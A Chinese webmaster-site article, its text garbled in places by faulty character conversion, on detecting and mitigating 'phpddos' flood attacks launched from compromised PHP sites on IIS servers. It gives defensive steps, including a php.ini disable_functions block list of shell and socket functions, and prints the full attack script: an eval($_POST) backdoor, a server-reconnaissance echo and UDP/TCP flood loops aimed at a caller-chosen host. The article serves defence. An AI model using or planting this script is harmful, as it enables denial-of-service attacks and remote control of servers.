| 這類攻擊有一個最大的特性,就是上傳流量霎時增大,通常流量高達數(shù)十以至近百M,將整臺效 勞器,以至將整臺機柜的寬帶堵住,使網(wǎng)站無法運轉(zhuǎn),而這樣的攻擊,我們無法從遠程處理,一但那個phpshell運轉(zhuǎn),你的寬帶將被全部占用,遠程都無法 銜接。 被攻擊后能做的只要聯(lián)絡(luò)機房的工作人員,讓他進到你的效勞器里把你的IIS關(guān)掉,再沒查分明是哪個站點被入侵時,盡量一個站點也不要開,以免再 次遭到攻擊,怎樣看是不是這個攻擊呢,不能說關(guān)掉ISS好了,就是這種攻擊了,而要依據(jù)更精確的查看,才能夠肯定是什么問題,翻開360平安衛(wèi)士,然后翻 開功用大全,到里面找到流量防火墻,在這里你能夠看到每一個進程的上傳和下載流量的幾,留意躲藏的系統(tǒng)效勞也要點開看一下,普通都是上傳超大才是 phpddos攻擊,而且普通都會在w3wp.exe和mysql.exe上傳流量會很大,最小也幾百M,最大幾G,好曉得是這個攻擊了,我們就來想方法 處理。 處理辦法: 1.應(yīng)用360流量防火墻,把w3wp.exe和mysql.exe的上傳流量限制一下,依據(jù)你效勞器本身寬帶的狀況停止限制,普通限制在 200—300KB都沒什么問題,這樣就不怕phpshell發(fā)起大流量攻擊了,不過這個方法有一個缺陷,就是當(dāng)你重新啟動效勞器時,你之前所限制 w3wp.exe和mysql.exe就不起作用了,要重新限制一下,用這個辦法的朋友一定要留意這一點。 2.經(jīng)過更改php運轉(zhuǎn)環(huán)境來處理,翻開php.ini找到disable_functions=這項,然后把后面改成 gzinflate,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,fsocket,fsockopen。 將allow_url_fopen = Off,再找到extension=php_sockets.dll這項,把前面加上分號,就是屏蔽掉這項。 3.經(jīng)過查找攻擊源處理,批量查找一切網(wǎng)站內(nèi)能否存在phpshell攻擊源代碼,源代碼為(由于代碼太亂以圖片方式展現(xiàn)給大家)如圖: 代碼如下: eval($_POST[Chr(90)]);set_time_limit(86400); ignore_user_abort(True); $packets = 0; $http = $_GET['http']; $rand = $_GET['exit']; $exec_time = $_GET['time']; if (StrLen($http)==0 or StrLen($rand)==0 or StrLen($exec_time)==0) { if(StrLen($_GET['rat'])<>0) { echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat']; exit; } echo "Php 2012 Terminator"; exit; } for($i=0;$i<65535;$i++) { $out .= "X"; } //Udp1-fsockopen Udp2 pfsockopen Tcp3 CC.center $max_time = time()+$exec_time; if($rand==53) while(1) { $packets++; if(time() > $max_time) { break; } $fp = fsockopen("udp://$http", $rand, $errno, $errstr, 5); if($fp) { fwrite($fp, $out); fclose($fp); } } else if($rand==500) while(1) { $packets++; if(time() > $max_time){ break; } $fp = pfsockopen("udp://$http", $rand, $errno, $errstr, 5); if($fp) { fwrite($fp, $out); fclose($fp); } } else while(1) { $packets++; if(time() > $max_time){ break; } $fp = pfsockopen("tcp://$http", $rand, $errno, $errstr, 5); if($fp) { fwrite($fp, $out); fclose($fp); } } ?> 經(jīng)過批量查找網(wǎng)站內(nèi)能否有類似上圖的源碼,找到后刪除,把網(wǎng)站權(quán)限設(shè)置為不可寫入,這樣在沒有修補好這個網(wǎng)站破綻前,不會再被植入木馬了。 |
免責(zé)聲明:本站部分文章和圖片均來自用戶投稿和網(wǎng)絡(luò)收集,旨在傳播知識,文章和圖片版權(quán)歸原作者及原出處所有,僅供學(xué)習(xí)與參考,請勿用于商業(yè)用途,如果損害了您的權(quán)利,請聯(lián)系我們及時修正或刪除。謝謝!
始終以前瞻性的眼光聚焦站長、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長轉(zhuǎn)型升級,為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營銷服務(wù),與站長一起進步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨!
掃一掃,關(guān)注站長網(wǎng)微信
大家都在看
